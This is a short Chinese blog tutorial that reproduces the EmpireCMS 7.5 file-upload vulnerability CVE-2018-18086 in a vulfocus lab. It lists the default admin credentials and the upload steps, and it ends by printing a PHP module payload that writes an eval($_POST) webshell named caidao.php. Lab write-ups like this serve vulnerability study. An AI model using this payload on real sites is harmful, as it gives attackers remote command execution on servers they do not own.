vulfocus-empirecms 文件上传 (CVE-2018-18086)漏洞复现详细教程
关于本地化搭建vulfocus靶场的师傅可以参考我置顶文章
KALI搭建log4j2靶场及漏洞复现全流程-CSDN博客https://blog.csdn.net/2301_78255681/article/details/147286844
一、漏洞描述:
EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS)。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。 密码:admin/123456 后台路径:/empirecms/e/admin
二、漏洞复现:
1、来到vulfocus镜像管理界面,下载靶场环境,也可以在vulfocus官网直接启动靶场环境
Vulfocus 漏洞威胁分析平台https://vulfocus.cn/#/dashboard
2、来到后台页面
3、登录进入后台,账号密码admin/123456
4、寻找发现文件上传地点
5、导入木马文件666.php.mod,使他创建一个caidao.php的木马文件
<?php file_put_contents("caidao.php","<?php @eval(\$_POST[cmd]); ?>");?>